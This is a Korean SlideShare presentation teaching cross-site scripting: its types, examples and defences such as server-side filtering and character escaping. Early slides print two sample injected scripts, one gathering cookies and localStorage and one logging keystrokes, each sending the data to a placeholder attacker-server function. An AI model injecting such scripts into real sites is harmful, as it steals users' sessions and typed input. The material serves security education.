SlideShare a Scribd company logo

XSS 에 대해서 알아보자. [실습 포함]

Download as PPTX, PDF
용진 조
용진 조

xss 에 대한 발표를 한번 해 보았습니다. 뽀로로는 심심할까봐 넣어놓았습니다.

Technology
1 of 19
XSS를.araboza 실습을 통해 배우는 Cross Site Scripting dydwls121200@gmail.com 조용진 XSS 어디에나 있지만. 어디에도 있으면 안된다.
1. XSS의 정의 2. XSS의 유형 3. XSS의 사례 및 실습 4. 대처방안
2. XSS의 유형 XSS가 뭘까요-?
1. XSS의 정의 사이트간 스크립팅, 크로스 사이트 스크립팅 영문 명칭 Cross-Site Scripting은 웹 애플리케이션에서 많이 나타나는 취약점의 하나로 웹 사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입 할 수 있는 취약점. (Wikipedia : 크로스사이트 스크립팅의 정의)
1. XSS의 정의
악성스크립트? http://likemilk.fun25.co.kr:15405/ 삽입 script 1 console.log(document.cookie); console.log(document); console.log(localStorage); Var hijecking = {}; hijecking.cookie = document.cookie; hijecking.document = document; hijecking.localStorage = localStorage; //알아서 코딩.. ㅎㅎ ; SendAttackerServer(hijecking); 삽입 script 2 Var input=“”; $(document).on(‘keyup’,function(event){ input+=event.key; console.log(input); input=input.replace(‘Backspace’); //등등… }); //알아서 코딩 ㅎㅎ; $(document).on(‘click’,function(event){ SendAttackerServer(input); }); 1. XSS의 정의
2. XSS의 유형 XSS 유형에 대해 알아보아요-!
Reflective XSS 공격자가 악성 스크립 트가 포함된 URL을 클 라이언트에게 노출시 켜 클릭하도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 DOM XSS 클라이언트에서 수 신받은 문서를 공격 자가 의도한 문서로 조작한다. 2. XSS의 유형
Reflective XSS 2. XSS의 유형
1. 순수한 스트리밍 x동사이트인줄 알고 클릭했더니 악성 Active X가 설치됨 2. 이상한 사이트를 접속했더니 바탕화면에 바로가기가 설 치된다거나 이상한 사이트가 즐겨찾기됨 3. 유용한 유틸리티 다운받을 수 있는 URL이라 선택했는데 다운받고 나니 악성프로그램. 4. 악성 플래쉬 소스를 이용한 웹페이지를 열람하게됨. Reflective XSS 공격자가 악성 스크립트 가 포함된 URL을 클라이 언트에게 노출시켜 클릭 하도록 한다. 2. XSS의 유형
Stored XSS 2. XSS의 유형
1. 게시판에 악성 스크립트를 삽입한 글을 남기고 다른 사용 자가 해당 게시글을 읽었을 경우 악성 스크립트가 실행되게 된다. 2. 저장된 악성스크립트에 특정 돔객체의 event를 조작하는 스크립트를 삽입하여 악성스크립트를 실행하게 한다. 3. XmlHttpOpen,$.ajax, $.get, $.post 객체의 EventEmitter를 이용하여 공격자의 서버에도 피해자의 발생 데이터를 같이 받아볼 수 있도록 한다. Stored XSS 데이터 베이스에 악 성 스크립트를 저장 하여 클라이언트 브 라우저에서 실행 시 키게 하는 공격 4. 서버에서 문자열 치환 작업을 역 이용해서 스크립트를 삽 입하거나, 문자열의 인코딩을 아예 변환한 악성 스크립트를 저장하도록 한다. 2. XSS의 유형
DOM XSS 2. XSS의 유형
DOM XSS 클라이언트에서 수신 받은 문서를 공격자 가 의도한 문서로 조 작 한다. 1. 클라이언트가 읽을 수 있는 파라메터 값을 타인이 만들어 서 넣을 수 있는 기능이 있을 때 발생할 수 있다. 예: (친구의 이름:(이름에다가 악성스크립트를 넣을 때) 2. 서버에서 클라이언트에게 뿌리는 값이 다른 클라이언틀 에 의해 만들어지는 모든 입출력 데이터는 XSS 필터를 거치 고 난 후에 출력 될 수 있도록 해야한다. 2. XSS의 유형
3. XSS의 실습 실습을 해보아요-!
3. XSS의 실습 https://namu.wiki/w/XSS http://egloos.zum.com/keep/v/1030642 HTML 특수문자 인코더
4. 대처방안 막아볼까요-?
4. 대처 방안 Server-Side 에서 XSS 필터를 구현하자 외부 플러그인 및 라이브러리를 적용시킬 때 SQL Injection 및 XSS에 대한 성능을 자가진단으로 테스트해본다. 개인정보 및 운영 정보는 Client-Side에 저장 시키는것을 지양한다. [< > “ ‘ ; : ` ! @ # $ % & * | ( ) { } ] 위와 같은 문자열을 치환해서 사 용하도록 하자.
Refernces http://gudgud92.tistory.com/31 http://best421.tistory.com/63 http://cleverdj.tistory.com/51 https://namu.wiki/w/XSS http://www.kisa.or.kr/uploadfile/201312/201312161355109566.pdf

Recommended

ZabbixによるAWS監視のコツ
ZabbixによるAWS監視のコツZabbixによるAWS監視のコツ
ZabbixによるAWS監視のコツ
ShinsukeYokota
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
Daisuke_Dan
 
20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...
20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...
20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...
Amazon Web Services Japan
 
20200818 AWS Black Belt Online Seminar AWS Shield Advanced
20200818 AWS Black Belt Online Seminar AWS Shield Advanced20200818 AWS Black Belt Online Seminar AWS Shield Advanced
20200818 AWS Black Belt Online Seminar AWS Shield Advanced
Amazon Web Services Japan
 
AWS Black Belt Online Seminar 2017 Amazon S3
AWS Black Belt Online Seminar 2017 Amazon S3AWS Black Belt Online Seminar 2017 Amazon S3
AWS Black Belt Online Seminar 2017 Amazon S3
Amazon Web Services Japan
 
AWS Black Belt Online Seminar - Amazon Lightsail
AWS Black Belt Online Seminar - Amazon Lightsail AWS Black Belt Online Seminar - Amazon Lightsail
AWS Black Belt Online Seminar - Amazon Lightsail
Amazon Web Services Japan
 
20180509 AWS Black Belt Online Seminar Amazon GuardDuty
20180509 AWS Black Belt Online Seminar Amazon GuardDuty20180509 AWS Black Belt Online Seminar Amazon GuardDuty
20180509 AWS Black Belt Online Seminar Amazon GuardDuty
Amazon Web Services Japan
 
試験前に抑えておきたいRTX/vRX VPN接続
試験前に抑えておきたいRTX/vRX VPN接続試験前に抑えておきたいRTX/vRX VPN接続
試験前に抑えておきたいRTX/vRX VPN接続
Yasutaka Hamada
 

Recommended

ZabbixによるAWS監視のコツ
ZabbixによるAWS監視のコツZabbixによるAWS監視のコツ
ZabbixによるAWS監視のコツ
ShinsukeYokota
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
Daisuke_Dan
 
20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...
20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...
20190130 AWS Black Belt Online Seminar AWS Identity and Access Management (AW...
Amazon Web Services Japan
 
20200818 AWS Black Belt Online Seminar AWS Shield Advanced
20200818 AWS Black Belt Online Seminar AWS Shield Advanced20200818 AWS Black Belt Online Seminar AWS Shield Advanced
20200818 AWS Black Belt Online Seminar AWS Shield Advanced
Amazon Web Services Japan
 
AWS Black Belt Online Seminar 2017 Amazon S3
AWS Black Belt Online Seminar 2017 Amazon S3AWS Black Belt Online Seminar 2017 Amazon S3
AWS Black Belt Online Seminar 2017 Amazon S3
Amazon Web Services Japan
 
AWS Black Belt Online Seminar - Amazon Lightsail
AWS Black Belt Online Seminar - Amazon Lightsail AWS Black Belt Online Seminar - Amazon Lightsail
AWS Black Belt Online Seminar - Amazon Lightsail
Amazon Web Services Japan
 
20180509 AWS Black Belt Online Seminar Amazon GuardDuty
20180509 AWS Black Belt Online Seminar Amazon GuardDuty20180509 AWS Black Belt Online Seminar Amazon GuardDuty
20180509 AWS Black Belt Online Seminar Amazon GuardDuty
Amazon Web Services Japan
 
試験前に抑えておきたいRTX/vRX VPN接続
試験前に抑えておきたいRTX/vRX VPN接続試験前に抑えておきたいRTX/vRX VPN接続
試験前に抑えておきたいRTX/vRX VPN接続
Yasutaka Hamada
 
DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
BGA Cyber Security
 
AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)
AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)
AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)
Amazon Web Services Japan
 
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
Hiroshi Tokumaru
 
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018 서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
Amazon Web Services Korea
 
ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)
ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)
ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)
Amazon Web Services Japan
 
AWS Black Belt Online Seminar AWS Key Management Service (KMS)
AWS Black Belt Online Seminar AWS Key Management Service (KMS) AWS Black Belt Online Seminar AWS Key Management Service (KMS)
AWS Black Belt Online Seminar AWS Key Management Service (KMS)
Amazon Web Services Japan
 
AWS Shieldのご紹介 Managed DDoS Protection
AWS Shieldのご紹介 Managed DDoS ProtectionAWS Shieldのご紹介 Managed DDoS Protection
AWS Shieldのご紹介 Managed DDoS Protection
Amazon Web Services Japan
 
カジュアルにVPC作った結果がこれだよ!
カジュアルにVPC作った結果がこれだよ!カジュアルにVPC作った結果がこれだよ!
カジュアルにVPC作った結果がこれだよ!
Emma Haruka Iwao
 
[社内勉強会]ELBとALBと数万スパイク負荷テスト
[社内勉強会]ELBとALBと数万スパイク負荷テスト[社内勉強会]ELBとALBと数万スパイク負荷テスト
[社内勉強会]ELBとALBと数万スパイク負荷テスト
Takahiro Moteki
 
IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)
IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)
IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)
NTT DATA Technology & Innovation
 
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
Enpel
 
20200812 AWS Black Belt Online Seminar Amazon Macie
20200812 AWS Black Belt Online Seminar Amazon Macie20200812 AWS Black Belt Online Seminar Amazon Macie
20200812 AWS Black Belt Online Seminar Amazon Macie
Amazon Web Services Japan
 
Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤
Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤
Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤
Amazon Web Services Japan
 
画像ベース異常検知Amazon Lookout for Visionを使ってみよう
画像ベース異常検知Amazon Lookout for Visionを使ってみよう画像ベース異常検知Amazon Lookout for Visionを使ってみよう
画像ベース異常検知Amazon Lookout for Visionを使ってみよう
TakanoriTsutsui
 
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
Takehiro Suemitsu
 
サーバPUSHざっくりまとめ
サーバPUSHざっくりまとめサーバPUSHざっくりまとめ
サーバPUSHざっくりまとめ
Yasuhiro Mawarimichi
 
AWS Black Belt Techシリーズ Amazon VPC
AWS Black Belt Techシリーズ Amazon VPCAWS Black Belt Techシリーズ Amazon VPC
AWS Black Belt Techシリーズ Amazon VPC
Amazon Web Services Japan
 
マイクロサービスにおける 結果整合性との戦い
マイクロサービスにおける 結果整合性との戦いマイクロサービスにおける 結果整合性との戦い
マイクロサービスにおける 結果整合性との戦い
ota42y
 
セキュリティの都市伝説を暴く
セキュリティの都市伝説を暴くセキュリティの都市伝説を暴く
セキュリティの都市伝説を暴く
Hiroshi Tokumaru
 
爆速クエリエンジン”Presto”を使いたくなる話
爆速クエリエンジン”Presto”を使いたくなる話爆速クエリエンジン”Presto”を使いたくなる話
爆速クエリエンジン”Presto”を使いたくなる話
Kentaro Yoshida
 
#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action
Robin Sedlaczek
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript Obfuscation
Jason Choi
 

More Related Content

What's hot

DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
BGA Cyber Security
 
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018 서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
Amazon Web Services Korea
 
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
Enpel
 
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
Takehiro Suemitsu
 

What's hot (20)

DOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma YöntemleriDOS, DDOS Atakları ve Korunma Yöntemleri
DOS, DDOS Atakları ve Korunma Yöntemleri
 
AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)
AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)
AWS Blackbelt 2015シリーズ Amazon EC2 Container Service (Amazon ECS)
 
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
 
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018 서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
서버리스 웹 애플리케이션 구축 방법론::김현수:: AWS Summit Seoul 2018
 
ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)
ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)
ゲームアーキテクチャパターン (Aurora Serverless / DynamoDB)
 
AWS Black Belt Online Seminar AWS Key Management Service (KMS)
AWS Black Belt Online Seminar AWS Key Management Service (KMS) AWS Black Belt Online Seminar AWS Key Management Service (KMS)
AWS Black Belt Online Seminar AWS Key Management Service (KMS)
 
AWS Shieldのご紹介 Managed DDoS Protection
AWS Shieldのご紹介 Managed DDoS ProtectionAWS Shieldのご紹介 Managed DDoS Protection
AWS Shieldのご紹介 Managed DDoS Protection
 
カジュアルにVPC作った結果がこれだよ!
カジュアルにVPC作った結果がこれだよ!カジュアルにVPC作った結果がこれだよ!
カジュアルにVPC作った結果がこれだよ!
 
[社内勉強会]ELBとALBと数万スパイク負荷テスト
[社内勉強会]ELBとALBと数万スパイク負荷テスト[社内勉強会]ELBとALBと数万スパイク負荷テスト
[社内勉強会]ELBとALBと数万スパイク負荷テスト
 
IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)
IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)
IAM Roles Anywhereのない世界とある世界(2022年のAWSアップデートを振り返ろう ~Season 4~ 発表資料)
 
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
2 TomcatによるWebアプリケーションサーバ構築 第4章 Tomcatの構成(1)-仮想ホスト、Apache連携
 
20200812 AWS Black Belt Online Seminar Amazon Macie
20200812 AWS Black Belt Online Seminar Amazon Macie20200812 AWS Black Belt Online Seminar Amazon Macie
20200812 AWS Black Belt Online Seminar Amazon Macie
 
Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤
Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤
Kinesis + Elasticsearchでつくるさいきょうのログ分析基盤
 
画像ベース異常検知Amazon Lookout for Visionを使ってみよう
画像ベース異常検知Amazon Lookout for Visionを使ってみよう画像ベース異常検知Amazon Lookout for Visionを使ってみよう
画像ベース異常検知Amazon Lookout for Visionを使ってみよう
 
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
AWSでAPI Gatewayから非同期でLambdaを起動してS3にファイルアップロードしようとしたらハマった話。
 
サーバPUSHざっくりまとめ
サーバPUSHざっくりまとめサーバPUSHざっくりまとめ
サーバPUSHざっくりまとめ
 
AWS Black Belt Techシリーズ Amazon VPC
AWS Black Belt Techシリーズ Amazon VPCAWS Black Belt Techシリーズ Amazon VPC
AWS Black Belt Techシリーズ Amazon VPC
 
マイクロサービスにおける 結果整合性との戦い
マイクロサービスにおける 結果整合性との戦いマイクロサービスにおける 結果整合性との戦い
マイクロサービスにおける 結果整合性との戦い
 
セキュリティの都市伝説を暴く
セキュリティの都市伝説を暴くセキュリティの都市伝説を暴く
セキュリティの都市伝説を暴く
 
爆速クエリエンジン”Presto”を使いたくなる話
爆速クエリエンジン”Presto”を使いたくなる話爆速クエリエンジン”Presto”を使いたくなる話
爆速クエリエンジン”Presto”を使いたくなる話
 

Viewers also liked

Drive by downloads-cns
Drive by downloads-cnsDrive by downloads-cns
Drive by downloads-cns
mmubashirkhan
 

Viewers also liked (19)

#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action#ADC 2016 - C# Script in Action
#ADC 2016 - C# Script in Action
 
Drive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript ObfuscationDrive-By Download & JavaScript Obfuscation
Drive-By Download & JavaScript Obfuscation
 
(FICON2015) #3 어떻게 들어왔는가?
(FICON2015) #3 어떻게 들어왔는가?(FICON2015) #3 어떻게 들어왔는가?
(FICON2015) #3 어떻게 들어왔는가?
 
Drive by downloads-cns
Drive by downloads-cnsDrive by downloads-cns
Drive by downloads-cns
 
(FICON2015) #4 어떻게 가져갔는가?
(FICON2015) #4 어떻게 가져갔는가?(FICON2015) #4 어떻게 가져갔는가?
(FICON2015) #4 어떻게 가져갔는가?
 
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
(Ficon2016) #5 포렌식 사례를 알아보지 말입니다!
 
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
모바일 악성코드 분석 실무 요약(공개버전)_미완성 참고버전
 
Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자Fiddler 피들러에 대해 알아보자
Fiddler 피들러에 대해 알아보자
 
02.모의해킹전문가되기
02.모의해킹전문가되기02.모의해킹전문가되기
02.모의해킹전문가되기
 
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
(FICON2015) #5 보안담당자가 겪는 실무적 이슈와 법률적 검토
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안Apt(advanced persistent threat) 공격의 현재와 대응 방안
Apt(advanced persistent threat) 공격의 현재와 대응 방안
 
(FICON2015) #1 어떻게 대응할 것인가?
(FICON2015) #1 어떻게 대응할 것인가?(FICON2015) #1 어떻게 대응할 것인가?
(FICON2015) #1 어떻게 대응할 것인가?
 
(FICON2015) #2 어떻게 조사할 것인가?
(FICON2015) #2 어떻게 조사할 것인가?(FICON2015) #2 어떻게 조사할 것인가?
(FICON2015) #2 어떻게 조사할 것인가?
 
시스템 보안에 대해 최종본
시스템 보안에 대해 최종본시스템 보안에 대해 최종본
시스템 보안에 대해 최종본
 
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
캐빈머피 머신러닝 Kevin Murphy Machine Learning Statistic
 
APT Case Study
APT Case StudyAPT Case Study
APT Case Study
 
how to use fiddler (Ver eng)
how to use fiddler (Ver eng)how to use fiddler (Ver eng)
how to use fiddler (Ver eng)
 
Build Features, Not Apps
Build Features, Not AppsBuild Features, Not Apps
Build Features, Not Apps
 

Similar to XSS 에 대해서 알아보자. [실습 포함]

Web vulnerability seminar3
Web vulnerability seminar3Web vulnerability seminar3
Web vulnerability seminar3
Sakuya Izayoi
 
컴퓨터보안.pptx
컴퓨터보안.pptx컴퓨터보안.pptx
컴퓨터보안.pptx
dalonn
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
ChangKyu Song
 

Similar to XSS 에 대해서 알아보자. [실습 포함] (11)

XSS(Cross site scripting) - Kitworks Team Study
XSS(Cross site scripting) - Kitworks Team StudyXSS(Cross site scripting) - Kitworks Team Study
XSS(Cross site scripting) - Kitworks Team Study
 
Web vulnerability seminar3
Web vulnerability seminar3Web vulnerability seminar3
Web vulnerability seminar3
 
컴퓨터보안.pptx
컴퓨터보안.pptx컴퓨터보안.pptx
컴퓨터보안.pptx
 
랜섬웨어 엔딩 #2016 1Q
랜섬웨어 엔딩 #2016 1Q랜섬웨어 엔딩 #2016 1Q
랜섬웨어 엔딩 #2016 1Q
 
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
제12회 IT4U 강연회 - 화이트햇 해커들의 웹 해킹
 
Web hacking 개요
Web hacking 개요Web hacking 개요
Web hacking 개요
 
Springcamp 2015 - xss는 네가 맡아라
Springcamp 2015 - xss는 네가 맡아라Springcamp 2015 - xss는 네가 맡아라
Springcamp 2015 - xss는 네가 맡아라
 
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
[NDC07] 게임 개발에서의 클라이언트 보안 - 송창규
 
Web framework security
Web framework securityWeb framework security
Web framework security
 
Web framework security
Web framework securityWeb framework security
Web framework security
 
5-5. html5 connectivity
5-5. html5 connectivity5-5. html5 connectivity
5-5. html5 connectivity
 

More from 용진 조

신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
용진 조
 

More from 용진 조 (7)

Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txtElasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
Elasticsearch 엘라스틱서치 (검색서비스) 에 대해 알아보자.txt
 
당근마켓에서 IaC경험
당근마켓에서 IaC경험당근마켓에서 IaC경험
당근마켓에서 IaC경험
 
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
신입개발자가 스타트업에서 AWS로 어떻게든 살아가는 썰
 
서버리스에 람다 대해 알아보자 [이론편] - 1
서버리스에 람다 대해 알아보자 [이론편] - 1서버리스에 람다 대해 알아보자 [이론편] - 1
서버리스에 람다 대해 알아보자 [이론편] - 1
 
유비쿼터스의 클라우드
유비쿼터스의 클라우드유비쿼터스의 클라우드
유비쿼터스의 클라우드
 
201133271 조용진 io t 발표
201133271 조용진 io t 발표201133271 조용진 io t 발표
201133271 조용진 io t 발표
 
개발자는 원래 말을 잘 못해요?
개발자는 원래 말을 잘 못해요?개발자는 원래 말을 잘 못해요?
개발자는 원래 말을 잘 못해요?
 

Recently uploaded

Merge (Kitworks Team Study 이성수 발표자료 240426)
Merge (Kitworks Team Study 이성수 발표자료 240426)Merge (Kitworks Team Study 이성수 발표자료 240426)
Merge (Kitworks Team Study 이성수 발표자료 240426)
Wonjun Hwang
 
Console API (Kitworks Team Study 백혜인 발표자료)
Console API (Kitworks Team Study 백혜인 발표자료)Console API (Kitworks Team Study 백혜인 발표자료)
Console API (Kitworks Team Study 백혜인 발표자료)
Wonjun Hwang
 

Recently uploaded (6)

Merge (Kitworks Team Study 이성수 발표자료 240426)
Merge (Kitworks Team Study 이성수 발표자료 240426)Merge (Kitworks Team Study 이성수 발표자료 240426)
Merge (Kitworks Team Study 이성수 발표자료 240426)
 
캐드앤그래픽스 2024년 5월호 목차
캐드앤그래픽스 2024년 5월호 목차캐드앤그래픽스 2024년 5월호 목차
캐드앤그래픽스 2024년 5월호 목차
 
MOODv2 : Masked Image Modeling for Out-of-Distribution Detection
MOODv2 : Masked Image Modeling for Out-of-Distribution DetectionMOODv2 : Masked Image Modeling for Out-of-Distribution Detection
MOODv2 : Masked Image Modeling for Out-of-Distribution Detection
 
Continual Active Learning for Efficient Adaptation of Machine LearningModels ...
Continual Active Learning for Efficient Adaptation of Machine LearningModels ...Continual Active Learning for Efficient Adaptation of Machine LearningModels ...
Continual Active Learning for Efficient Adaptation of Machine LearningModels ...
 
A future that integrates LLMs and LAMs (Symposium)
A future that integrates LLMs and LAMs (Symposium)A future that integrates LLMs and LAMs (Symposium)
A future that integrates LLMs and LAMs (Symposium)
 
Console API (Kitworks Team Study 백혜인 발표자료)
Console API (Kitworks Team Study 백혜인 발표자료)Console API (Kitworks Team Study 백혜인 발표자료)
Console API (Kitworks Team Study 백혜인 발표자료)
 

XSS 에 대해서 알아보자. [실습 포함]

  • 1. XSS를.araboza 실습을 통해 배우는 Cross Site Scripting dydwls121200@gmail.com 조용진 XSS 어디에나 있지만. 어디에도 있으면 안된다.
  • 2. 1. XSS의 정의 2. XSS의 유형 3. XSS의 사례 및 실습 4. 대처방안
  • 4. 1. XSS의 정의 사이트간 스크립팅, 크로스 사이트 스크립팅 영문 명칭 Cross-Site Scripting은 웹 애플리케이션에서 많이 나타나는 취약점의 하나로 웹 사이트 관리자가 아닌 이가 웹 페이지에 악성 스크립트를 삽입 할 수 있는 취약점. (Wikipedia : 크로스사이트 스크립팅의 정의)
